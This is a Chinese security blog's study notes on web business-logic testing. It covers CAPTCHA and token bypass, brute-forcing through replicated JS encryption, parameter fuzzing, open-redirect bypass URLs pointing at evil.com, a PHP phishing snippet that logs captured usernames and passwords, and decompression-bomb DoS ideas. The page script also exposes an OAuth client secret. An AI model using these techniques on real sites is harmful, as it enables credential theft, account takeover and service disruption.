<h2 id="滑块验证码-宏命令"><a href="#滑块验证码-宏命令" class="headerlink" title="滑块验证码-宏命令"></a>滑块验证码-宏命令</h2><p>参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/shuryuu/article/details/104576559">https://blog.csdn.net/shuryuu/article/details/104576559</a></p>
<p>如果看不太懂或者觉得很麻烦，可以参考下面这个文章，原理都是一样的(都是从响应包提取数据放到请求包里)</p>
<p>token防爆破?<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_60571842/article/details/133898472">https://blog.csdn.net/m0_60571842/article/details/133898472</a></p>
<p>同理也可以适用在Token，sign在响应页面中自动获取自动填入请求数据包后绕过验证</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="Fuzz模糊测试篇"><a href="#Fuzz模糊测试篇" class="headerlink" title="Fuzz模糊测试篇"></a>Fuzz模糊测试篇</h1><p>是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试。</p>
<p>‍</p>
<h2 id="Fuzz-应用场景"><a href="#Fuzz-应用场景" class="headerlink" title="Fuzz 应用场景"></a>Fuzz 应用场景</h2><ul>
<li>爆破用户口令</li>
<li>爆破敏感目录</li>
<li>爆破文件地址</li>
<li>爆破未知参数名</li>
<li>Payload 测漏洞（绕过等也可以用）</li>
</ul>
<p>‍</p>
<h2 id="弱口令–JS算法逆向"><a href="#弱口令–JS算法逆向" class="headerlink" title="弱口令–JS算法逆向"></a>弱口令–JS算法逆向</h2><h3 id="burp插件-1"><a href="#burp插件-1" class="headerlink" title="burp插件"></a>burp插件</h3><p>‍</p>
<h4 id="jsEncrypter"><a href="#jsEncrypter" class="headerlink" title="jsEncrypter"></a>jsEncrypter</h4><p>GitHub 下载地址：<a target="_blank" rel="noopener" href="https://github.com/c0ny1/jsEncrypter">https://github.com/c0ny1/jsEncrypter</a></p>
<ul>
<li><p>使用方法如下</p>
<ol>
<li><p>下载phantomjs并设置环境变量</p>
<p> 下载链接：<a target="_blank" rel="noopener" href="https://phantomjs.org/download.html">https://phantomjs.org/download.html</a></p>
</li>
<li><p>打开cmd输入phantomjs若如图显示则表示环境变量设置成功</p>
<p> <img src="/assets/image-20240903165235-21w0m7u.png" srcset="/img/loading.gif" lazyload alt="image-20240903165235-21w0m7u">​</p>
</li>
<li><p>BurpSuite加载jsEncrypter插件</p>
<p> 插件下载地址：<a target="_blank" rel="noopener" href="https://github.com/c0ny1/jsEncrypter/releases">https://github.com/c0ny1/jsEncrypter/releases</a></p>
<p> <img src="/assets/image-20240903165445-cwu6n4k.png" srcset="/img/loading.gif" lazyload alt="image-20240903165445-cwu6n4k">​</p>
<p> <img src="/assets/image-20240903165505-b5xrelv.png" srcset="/img/loading.gif" lazyload alt="image-20240903165505-b5xrelv">​</p>
<p> <img src="/assets/image-20240903165526-63jqdur.png" srcset="/img/loading.gif" lazyload alt="image-20240903165526-63jqdur">​</p>
</li>
<li><p>对逆向的加密算法提取JS文件及代码</p>
<p> <img src="/assets/image-20240903165731-h5tartu.png" srcset="/img/loading.gif" lazyload alt="image-20240903165731-h5tartu">​</p>
</li>
<li><p>将加密算法文件保存到相同目录下</p>
<p> <img src="/assets/image-20240903165834-el1gu6v.png" srcset="/img/loading.gif" lazyload alt="image-20240903165834-el1gu6v">​</p>
<p> <img src="/assets/image-20240903165904-hldp0sa.png" srcset="/img/loading.gif" lazyload alt="image-20240903165904-hldp0sa">​</p>
</li>
<li><p>修改phantomjs_server.js文件配置</p>
<p> <img src="/assets/image-20240903170150-3z16k5x.png" srcset="/img/loading.gif" lazyload alt="image-20240903170150-3z16k5x">​</p>
</li>
<li><p>在当前文件夹执行命令<code>phantomjs phantomjs_server.js</code>​</p>
<p> <img src="/assets/image-20240903170257-wffu2l1.png" srcset="/img/loading.gif" lazyload alt="image-20240903170257-wffu2l1">​</p>
<p> <img src="/assets/image-20240903170317-ut8lm0l.png" srcset="/img/loading.gif" lazyload alt="image-20240903170317-ut8lm0l">​</p>
</li>
<li><p>发包测试时也要注意引用插件选项</p>
<p> <img src="/assets/image-20240903170402-kucg7gj.png" srcset="/img/loading.gif" lazyload alt="image-20240903170402-kucg7gj">​</p>
<p> <img src="/assets/image-20240903170417-6ljswb4.png" srcset="/img/loading.gif" lazyload alt="image-20240903170417-6ljswb4">​</p>
<p> <img src="/assets/image-20240903170435-ofrv61j.png" srcset="/img/loading.gif" lazyload alt="image-20240903170435-ofrv61j">​</p>
</li>
<li><p>发包内容被成功加密</p>
<p> <img src="/assets/image-20240903170542-oibe7r9.png" srcset="/img/loading.gif" lazyload alt="image-20240903170542-oibe7r9">​</p>
</li>
</ol>
</li>
</ul>
<p>‍</p>
<h4 id="BurpCrypto"><a href="#BurpCrypto" class="headerlink" title="BurpCrypto"></a>BurpCrypto</h4><p>GitHub 下载地址：<a target="_blank" rel="noopener" href="https://github.com/whwlsfb/BurpCrypto">https://github.com/whwlsfb/BurpCrypto</a></p>
<p>‍</p>
<h2 id="爆破点-目录，文件名，参数，参数值，提交格式。。。。。"><a href="#爆破点-目录，文件名，参数，参数值，提交格式。。。。。" class="headerlink" title="爆破点-目录，文件名，参数，参数值，提交格式。。。。。"></a>爆破点-目录，文件名，参数，参数值，提交格式。。。。。</h2><p><strong>重点在于返回值不一样</strong></p>
<p>假设目标网站有这样一个路径：<a target="_blank" rel="noopener" href="http://xxx.xxx.xxx.xxx/admin/ping.php?do%5C=1">http://xxx.xxx.xxx.xxx/admin/ping.php?do\=1</a></p>
<ul>
<li><p>通过 Fuzz 爆破出来了这个路径文件，目录 &#x2F;admin，文件 ping.php</p>
<ul>
<li>直接访问页面返回一个 error</li>
</ul>
</li>
<li><p>但是找漏洞需要构造参数和参数值，但我们不知道参数名称和参数值</p>
</li>
<li><p>所以修改数据包将访问路径修改为 &#x2F;admin&#x2F;ping.php?a=1，然后对 a 进行爆破，这个 1 是瞎写的，是什么都可以</p>
<ul>
<li>即盲猜参数名</li>
<li>do 返回长度不同，其他都会返回 error，但是 do 返回没有 error，所以存在 do 参数名</li>
</ul>
</li>
<li><p>然后就使用字典再去爆破参数值，因为这里猜测是 rce，所以使用 rce 的字典去跑这个参数值</p>
<ul>
<li>成功得出结果</li>
</ul>
</li>
</ul>
<p>‍</p>
<p>字典在文件夹</p>
<p>‍</p>
<p>‍</p>
<h2 id="SRC未授权案例"><a href="#SRC未授权案例" class="headerlink" title="SRC未授权案例"></a>SRC未授权案例</h2><p><a href="assets/%E7%AC%AC76-1%E5%A4%A9%EF%BC%9AFuzz%E6%8A%80%E6%9C%AFSRC%E6%B3%84%E6%BC%8F%E6%9C%AA%E6%8E%88%E6%9D%83%E6%A1%88%E4%BE%8B%E6%8C%96%E6%8E%98-20240921164152-4i165y1.pdf">Fuzz技术SRC泄漏未授权案例挖掘.pdf</a></p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<p>‍</p>
<h1 id="隐私合规检测"><a href="#隐私合规检测" class="headerlink" title="隐私合规检测"></a>隐私合规检测</h1><p>‍</p>
<h2 id="检测项目-1"><a href="#检测项目-1" class="headerlink" title="检测项目"></a>检测项目</h2><ul>
<li><p>主要针对小程序 (小程序可能需要逆向) 和 APP</p>
</li>
<li><p>对象：APP 小程序等，测试时即可测试目标的 app 或者小程序是否隐私合规</p>
</li>
<li><p>例如检测目标是否在偷偷监听、录音、获取信息等</p>
</li>
<li><p>具体：后续 APP 安全课程</p>
<ul>
<li><p>appscan 官网：<a target="_blank" rel="noopener" href="https://appscan.ly.com/">https://appscan.ly.com/</a></p>
<ul>
<li>推荐这个，这个是动态分析</li>
<li>不过需要 root 安卓手机并且打开 ADB 调试</li>
</ul>
</li>
<li><p>appshark 的 GitHub 地址：<a target="_blank" rel="noopener" href="https://github.com/bytedance/appshark">https://github.com/bytedance/appshark</a></p>
<ul>
<li>这个是静态分析</li>
</ul>
</li>
</ul>
</li>
<li><p>vivo 隐私合规漏洞评分规则 v1.0 参考：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/tgEZth3TFyyis_EBrQ5PhQ">https://mp.weixin.qq.com/s/tgEZth3TFyyis_EBrQ5PhQ</a></p>
</li>
<li><p>MobSF 也可以进行测试</p>
<ul>
<li><p>Windows – MobSF 安装参考：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.cnblogs.com/B-hai/p/15696948.html">https://www.cnblogs.com/B-hai/p/15696948.html</a></li>
<li><a target="_blank" rel="noopener" href="https://blog.csdn.net/ljh824144294/article/details/119181803">https://blog.csdn.net/ljh824144294/article/details/119181803</a></li>
<li>补充：自己搭建比较麻烦，容易出很多莫名问题，<a target="_blank" rel="noopener" href="https://www.suyou.world/index.php/2023/08/16/%e7%ac%ac20%e5%a4%a9%ef%bc%9a%e4%bf%a1%e6%81%af%e6%89%93%e7%82%b9-%e7%ba%a2%e8%93%9d%e9%98%9f%e8%87%aa%e5%8a%a8%e5%8c%96%e9%a1%b9%e7%9b%ae%e8%b5%84%e4%ba%a7%e4%be%a6%e5%af%9f%e4%bc%81%e6%9f%a5/">第 20 天课程</a>中有一个 f8x 项目，可以自动化搭建，推荐使用这个来搭建。</li>
</ul>
</li>
<li><p>mobsf 分析 apk 后可以得到报告，查看报告内容</p>
<ul>
<li>可以看到该 apk 需要使用到的权限，然后看使用 apk 时是否会有提示</li>
</ul>
</li>
</ul>
</li>
</ul>
<p>‍</p>
<h2 id="URL重定向"><a href="#URL重定向" class="headerlink" title="URL重定向"></a>URL重定向</h2><p>‍</p>
<h3 id="黑盒"><a href="#黑盒" class="headerlink" title="黑盒"></a>黑盒</h3><h4 id="看业务"><a href="#看业务" class="headerlink" title="看业务"></a>看业务</h4><ul>
<li>用户登录、统一身份认证处，认证完后会跳转</li>
<li>用户分享、收藏内容过后，会跳转</li>
<li>跨站点认证、授权后，会跳转</li>
<li>站内点击其它网址链接时，会跳转</li>
</ul>
<h4 id="看参数名"><a href="#看参数名" class="headerlink" title="看参数名"></a>看参数名</h4><blockquote>
<p>redirect</p>
<p>redirect_to</p>
<p>redirect_url</p>
<p>url</p>
<p>jump</p>
<p>jump_to</p>
<p>target</p>
<p>to</p>
<p>link</p>
<p>linkto</p>
<p>domain</p>
</blockquote>
<p>还可以使用 google 语法搜索</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs cmd"><span class="hljs-function">site:<span class="hljs-title">xxx.xxx</span> <span class="hljs-title">inurl</span>:?<span class="hljs-title">url</span>=</span><br></code></pre></td></tr></table></figure>

<p>‍</p>
<p>‍</p>
<h3 id="白盒看代码块"><a href="#白盒看代码块" class="headerlink" title="白盒看代码块"></a>白盒看代码块</h3><ul>
<li><p>Java</p>
<ul>
<li>response.sendRedirect(request.getParameter(“url”))</li>
</ul>
</li>
<li><p>PHP:</p>
<ul>
<li>$redirect_url = $_GET[‘url’];</li>
<li>header(“Location: “ . $redirect_url)</li>
</ul>
</li>
<li><p>.NET:</p>
<ul>
<li>string redirect_url = request.QueryString[“url”];</li>
<li>Response.Redirect(redirect_url);</li>
</ul>
</li>
<li><p>Django:</p>
<ul>
<li>redirect_url = request.GET.get(“url”)</li>
<li>HttpResponseRedirect(redirect_url)</li>
</ul>
</li>
<li><p>Flask:</p>
<ul>
<li>redirect_url = request.form[‘url’]</li>
<li>redirect(redirect_url)</li>
</ul>
</li>
<li><p>Rails:</p>
<ul>
<li>redirect_to params[:url]</li>
</ul>
</li>
</ul>
<p>‍</p>
<h3 id="跳转-url-绕过思路"><a href="#跳转-url-绕过思路" class="headerlink" title="跳转 url 绕过思路"></a>跳转 url 绕过思路</h3><ul>
<li><p>单斜线 “&#x2F;“ 绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=/www.evil.com<br></code></pre></td></tr></table></figure>
</li>
<li><p>缺少协议绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=//www.evil.com<br></code></pre></td></tr></table></figure></li>
<li><p>多斜线 “&#x2F;“ 前缀绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=///www.evil.com https://www.landgrey.me/redirect.php?url=www.evil.com<br></code></pre></td></tr></table></figure></li>
<li><p>利用 “@” 符号绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=https://www.landgrey.me@www.evil.com<br></code></pre></td></tr></table></figure></li>
<li><p>利用反斜线 “\“ 绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me<br></code></pre></td></tr></table></figure></li>
<li><p>利用 “#” 符号绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=https://www.evil.com#www.landgrey.me<br></code></pre></td></tr></table></figure></li>
<li><p>利用 “?” 号绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me<br></code></pre></td></tr></table></figure></li>
<li><p>利用 “\\“ 绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=https://www.evil.com\\www.landgrey.me<br></code></pre></td></tr></table></figure></li>
<li><p>利用 “.” 绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=.evil           <br>(可能会跳转到www.landgrey.me.evil域名) <br>https://www.landgrey.me/redirect.php?url=.evil.com       <br>(可能会跳转到evil.com域名)<br></code></pre></td></tr></table></figure></li>
<li><p>重复特殊字符绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs url">https://www.landgrey.me/redirect.php?url=///www.evil.com//.. <br>https://www.landgrey.me/redirect.php?url=www.evil.com//..<br></code></pre></td></tr></table></figure></li>
</ul>
<p>‍</p>
<p>‍</p>
<h2 id="钓鱼配合"><a href="#钓鱼配合" class="headerlink" title="钓鱼配合"></a>钓鱼配合</h2><p>使用 Teleport Ultra 工具将目标网站整个页面爬取下来</p>
<ul>
<li><p>下载使用可参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_44035882/article/details/127531747">https://blog.csdn.net/qq_44035882&#x2F;article&#x2F;details&#x2F;127531747</a></p>
</li>
<li><p>自己会用什么语言，就用什么语言写劫持代码，如这里使用 php，将原本的 login.html 修改为 login.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><code class="hljs php">在文件开头添加php代码 <br><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-variable">$u</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;username&#x27;</span>]; <br><span class="hljs-variable">$p</span>=<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>]; <br><span class="hljs-variable">$f</span>=<span class="hljs-title function_ invoke__">fopen</span>(<span class="hljs-string">&#x27;pass.txt&#x27;</span>,<span class="hljs-string">&#x27;a+&#x27;</span>); <br><span class="hljs-title function_ invoke__">fwrite</span>(<span class="hljs-variable">$f</span>,<span class="hljs-variable">$u</span>.<span class="hljs-string">&quot;|&quot;</span>.<span class="hljs-variable">$p</span>.<span class="hljs-string">&quot;\n&quot;</span>); <br><span class="hljs-title function_ invoke__">fclose</span>(<span class="hljs-variable">$f</span>); <br><span class="hljs-meta">?&gt;</span> <br> <br>使用form包裹输入用户名密码的地方，将用户名密码提交到当前文件 <br>&lt;form action=<span class="hljs-string">&quot;login.php&quot;</span> method=<span class="hljs-string">&quot;POST&quot;</span>&gt; <br>提交参数名记得要和php代码中的对应 <br>&lt;/form&gt;<br></code></pre></td></tr></table></figure></li>
</ul>
<p>‍</p>
<p>‍</p>
<h2 id="资源拒绝服务"><a href="#资源拒绝服务" class="headerlink" title="资源拒绝服务"></a>资源拒绝服务</h2><ul>
<li><p>功能 ：网站验证码或图片可以自定义显示大小</p>
<ul>
<li>将大小设置为很大，将服务器 cpu 拉满，达到拒绝服务的目的</li>
</ul>
</li>
<li><p>功能 ：网站可以上传压缩包解压循环</p>
<ul>
<li>压缩包里面还是压缩包 (套娃即压缩包炸弹) 造成资源占用，达到拒绝服务的目的</li>
</ul>
</li>
</ul>
<p>‍</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E4%B8%9A%E5%8A%A1%E9%80%BB%E8%BE%91/" class="category-chain-item">业务逻辑</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>业务逻辑</div>
      <div>http://example.com/2024/08/05/业务逻辑/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>0z-sIHN</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年8月5日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/09/05/%E6%9C%8D%E5%8A%A1%E6%94%BB%E9%98%B2/" title="服务攻防">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">服务攻防</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/05/%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91/" title="安全开发🧩">
                        <span class="hidden-mobile">安全开发🧩</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="gitalk-container"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#gitalk-container', function() {
      Fluid.utils.createCssLink('/css/gitalk.css')
      Fluid.utils.createScript('https://lib.baomitu.com/gitalk/1.8.0/gitalk.min.js', function() {
        var options = Object.assign(
          {"clientID":"Ov23liT0OJSQBYUz81HU","clientSecret":"02c5c39d96d158a8a34967805e40cb90a7b2f1cf","repo":"0z-sihn.github.io","owner":"0z-sIHN","admin":["0z-sIHN"],"language":"zh-CN","labels":["Gitalk"],"perPage":10,"pagerDirection":"last","distractionFreeMode":true,"createIssueManually":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token"},
          {
            id: 'eb66063b60b6c8d659617996309781f0'
          }
        )
        var gitalk = new Gitalk(options);
        gitalk.render('gitalk-container');
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
<div>
  <span id="timeDate">正在载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("08/17/2020 00:00:00");
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🚀已持续航行&nbsp"+dnum+"&nbsp天";  
      document.getElementById("times").innerHTML = hnum + "&nbsp时&nbsp" + mnum + "&nbsp分&nbsp" + snum + "&nbsp秒";
  }
  setInterval("createtime()",250);
  </script>
</div>

  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  
<script src="/diy_js/typing-effect.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
